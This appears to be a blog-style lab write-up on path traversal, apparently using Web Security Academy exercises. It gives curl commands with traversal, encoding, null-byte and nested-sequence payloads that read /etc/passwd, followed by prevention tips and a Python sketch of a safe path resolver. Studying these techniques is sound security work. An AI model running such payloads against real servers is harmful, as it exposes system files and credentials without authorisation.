Path Traversal

Path traversal is also known as directory traversal. These vulnerabilities enable an attacker to read arbitrary files on the server that is running an application. This can include:

  • Environment variables.
  • Running program details.
  • Application code and data.
  • Credentials for back-end systems.
  • Sensitive operating system files.

Reading arbitrary files via path traversal

Most common way (file path traversal, simple case)

[Original]
curl -s https://0a42008e046aadb78126bbdb001f000c.web-security-academy.net/image?filename=50.jpg 

[Final]
curl -s https://0a42008e046aadb78126bbdb001f000c.web-security-academy.net/image?filename=../../../../etc/passwd

Common obstacles to exploiting path traversal vulnerabilities

Attackers frequently overcome these obstacles through:

URL Encoding

Using encoded sequences like %2e%2e%2f or double-encoded %252e%252e%252f to bypass basic filters.

[Method 1]

..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd

URL-encoded:
curl -s https://0a610034030cdad383a16e4f00640069.web-security-academy.net/image?filename=%2e%2e%25%32%66%2e%2e%25%32%66%2e%2e%25%32%66%2e%2e%25%32%66%2e%2e%25%32%66%2e%2e%25%32%66%2e%2e%25%32%66%2e%2e%25%32%66%65%74%63%25%32%66%70%61%73%73%77%64


[Method 2]

..%252f..%252f..%252fetc/passwd

curl -s https://0a610034030cdad383a16e4f00640069.web-security-academy.net/image?filename=..%252f..%252f..%252fetc/passwd

Absolute Paths

Directly referencing sensitive files from the root (e.g., /etc/passwd) to avoid using traversal sequences entirely. 

curl -s https://0aa6006804a1ad708104c0fb000d004e.web-security-academy.net/image?filename=/etc/passwd

Nested Sequences

Utilizing patterns like ....// which simplify to ../ when inner sequences are stripped. 

curl -s https://0a18008703e9344681ad8eec005a0015.web-security-academy.net/image?filename=....//....//....//....//....//....//....//....//etc/passwd

Null Byte Injection

Appending null bytes (e.g., ../../../etc/passwd\u0000.png) to truncate the file path before a required extension. 

curl -s https://0a34003d04a2c03680542bcf00a30033.web-security-academy.net/image?filename=../../../../../../../etc/passwd%00.jpg

curl -s https://0a34003d04a2c03680542bcf00a30033.web-security-academy.net/image?filename=..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00.jpg

Path Traversal Through Expected base folder

Here the supplied filename starts with the expected base folder and the traversal sequences follow it, like this: filename=/var/www/images/../../../etc/passwd

curl -s https://0aad00890367da0583fa78b400030033.web-security-academy.net/image?filename=/var/www/images/../../../../etc/passwd

curl -s https://0aad00890367da0583fa78b400030033.web-security-academy.net/image?filename=/var/www/images/..%2f..%2f..%2f..%2fetc%2fpasswd

curl -s https://0aad00890367da0583fa78b400030033.web-security-academy.net/image?filename=%2fvar%2fwww%2fimages%2f..%2f..%2f..%2f..%2fetc%2fpasswd

Non-Standard Encodings

Exploiting overlong UTF-8 encodings or non-standard characters like ..%c0%af that decoders may interpret differently. 

How to prevent a path traversal attack

  • Input Validation & Whitelisting
  • Canonicalize and Validate the Path
  • Principle of Least Privilege
  • Avoid Direct User Input

Additional Measures: Store sensitive files outside the web root, disable directory listings, and keep software and dependencies updated.

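
As an added example for the "Canonicalize and Validate the Path" measure (not code from the original post), the Python sketch below compares a strip-once filter with a canonicalize-then-check resolver on input shapes taken from the sections above. The function names are hypothetical, the samples are constructed, and /var/www/images is the base folder used in the post's own examples.

```python
import os
from urllib.parse import unquote

BASE_DIR = "/var/www/images"  # base folder used in the post's examples

def naive_resolve(filename, base_dir=BASE_DIR):
    """Weak pattern: strip '../' once, then join onto the base folder."""
    return os.path.join(base_dir, filename.replace("../", ""))

def safe_resolve(filename, base_dir=BASE_DIR):
    """Return the canonical path if it stays inside base_dir, else raise ValueError."""
    if "\x00" in filename:
        raise ValueError("null byte in filename")
    if unquote(filename) != filename:
        # Leftover percent-encoding changes meaning if a later layer decodes again.
        raise ValueError("residual URL encoding")
    base = os.path.realpath(base_dir)
    # realpath collapses '..' and resolves symlinks; join lets an absolute name replace base.
    candidate = os.path.realpath(os.path.join(base, filename))
    if os.path.commonpath([base, candidate]) != base:
        raise ValueError("resolved path is outside the base folder")
    return candidate

def escapes_base(path, base_dir=BASE_DIR):
    """True when the canonical form of path lies outside base_dir."""
    base = os.path.realpath(base_dir)
    return os.path.commonpath([base, os.path.realpath(path)]) != base

# Constructed samples: the filename value as seen after the server's single URL-decode.
SAMPLES = [
    "50.jpg",
    "../../../../etc/passwd",
    "/etc/passwd",
    "....//....//....//....//etc/passwd",
    "..%2f..%2f..%2fetc/passwd",
    "/var/www/images/../../../../etc/passwd",
]

def audit(samples=SAMPLES):
    """Map each sample to (naive filter escapes base?, safe_resolve verdict)."""
    report = {}
    for name in samples:
        try:
            safe_resolve(name)
            verdict = "allowed"
        except ValueError as exc:
            verdict = "rejected: " + str(exc)
        report[name] = (escapes_base(naive_resolve(name)), verdict)
    return report
```

The nested `....//` sample is allowed by safe_resolve because, with no stripping step, `....` is only an ordinary directory name under the base folder; it becomes a traversal only when a filter removes the inner `../`. The strip-once filter blocks the simple case but lets the absolute path and the nested sequence through.
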
This post is licensed under CC BY 4.0 by the author.